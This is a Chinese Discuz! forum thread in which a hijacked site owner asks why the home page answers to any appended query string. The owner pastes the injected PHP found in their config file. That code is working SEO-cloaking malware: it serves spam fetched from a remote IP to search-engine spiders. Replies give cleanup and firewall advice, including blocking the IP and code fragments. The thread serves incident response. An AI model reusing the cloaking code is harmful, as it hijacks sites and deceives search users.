设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
Discuz!官方免费开源建站系统»论坛 Discuz! 交流与讨论 站长帮 网站被劫持后发现网站首页后面加任意字符都可以访问如何 ...
返回列表 发新帖

[新需求] 网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?

[复制链接]
1270643127 发表于 2020-11-29 23:20:07 | 显示全部楼层 |阅读模式
需求发布
金额范围: 50-100 元
预算金额: 50 元
开始时间:
结束时间:
联系方式: 隐藏内容
网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?/ b% e* ]. @7 e
; V% l# E- O: q( Q6 z
网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
- e, z* U0 r1 \  N7 |百度收录大量的这样帖子
- O$ B: k; L9 y: d$ Z6 ^: ~7 X% ]( I3 E: t% ~* y
现在如何解决这样的?
+ V3 n  a3 V, O. q$ z- d8 l" Y' c
宝塔面板。。。。。。
, B$ y- I* A/ U) \" S* R# w! q) h7 O% Y7 B
如/forum.php?1234566 S* |6 ?( o8 ^, v7 E. Y
/forum.php?12365$ D* e, Z* l% n, P/ ]$ \4 N
/forum.php?515151
! U: N2 N+ J) c0 U/ Q% V% H# |+ g0 S+ s- O5 {2 O
随便加都可以访问,只有首页而已其他文章帖子加就不可以。。。6 y6 M, V& @2 E2 Z3 B  [& T
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 00:17:02 | 显示全部楼层
- X0 B) f. d( ^  A, E
#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}% o5 \7 `+ v1 J1 W
// --------------------------  CONFIG ADMINCP  -------------------------- //$ \+ E3 n5 N9 d! e. |" t4 z
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //6 G- L8 u$ n9 }+ c
回复

使用道具 举报

cardz! 发表于 2020-11-30 06:34:12 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

Failure 发表于 2020-11-30 11:16:25 | 显示全部楼层
你找到了劫持代码 并没有找到后门在哪,还是会出现的
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 11:34:07 | 显示全部楼层
cardz! 发表于 2020-11-30 06:344 N8 V" L8 B6 F& J
这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998
+ }8 y, B* Q9 |# j
啥原因呀?现在是加啥都还可以访问..
回复

使用道具 举报

cardz! 发表于 2020-11-30 13:54:57 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

 楼主| 1270643127 发表于 2020-11-30 17:40:38 | 显示全部楼层
cardz! 发表于 2020-11-30 13:54
1 e3 E6 J$ M, c0 {谁的都可以,不只是你的。
; i/ Q; b1 Q7 m6 w; T  L* Q6 u
那不是不能解决了?已经收录了好多了
回复

使用道具 举报

babyfacer 发表于 2020-12-12 18:45:36 | 显示全部楼层
1270643127 发表于 2020-11-30 17:40+ f4 z" ~+ g& e
那不是不能解决了?已经收录了好多了

8 T' \2 S2 F1 U" x你先把config里边那段代码删除,然后还要检查最近新增和修改的文件9 ?4 f% f# D3 i

# T& B4 K4 e& N5 y你去做一个抓取测试(你自己正常访问页面,是正常的,但是蜘蛛访问,是另外一个样子)
, }) F6 Q- ]! g. G  I% |* i如果没有注册百度站长或者百度统计,就去下面这个网址,也可以
7 V" J3 A% L3 y, f5 Q2 a) D
  1. http://stool.chinaz.com/tools/webcheck.aspx
复制代码
+ l2 O( A: j% i
$ n- v% t2 i) w- {
如果以前的那些页面依然有问题,就说明你没有清除干净(也算不上清除干净,你删除了恶意代码,但是后门还是在的)
3 B4 K' O+ W0 r& l3 z! @" T' K. n0 o" S
我自己网站的黑链网址是/?s***.后缀   清除之后,这些页面就不能访问了,然后你可以去百度提交死链,删除这些快照。当然啦,我很早以前就在robots里边直接屏蔽了【?】 所以被挂黑链半个月,百度 根本没有收录黑链。然后我发现黑链之后,直接去百度申请闭站了,解决完了才恢复的
回复

使用道具 举报

babyfacer 发表于 2020-12-12 18:47:55 | 显示全部楼层
而且你使用宝塔,宝塔有免费防火墙,你可以把恶意代码的一些关键词,比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且,定期扫描(扫描结果要分析哈,DZ默认的某些文件也会被扫描出有问题,但是并不是真的有问题)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-4-26 01:37 , Processed in 0.179873 second(s), 18 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表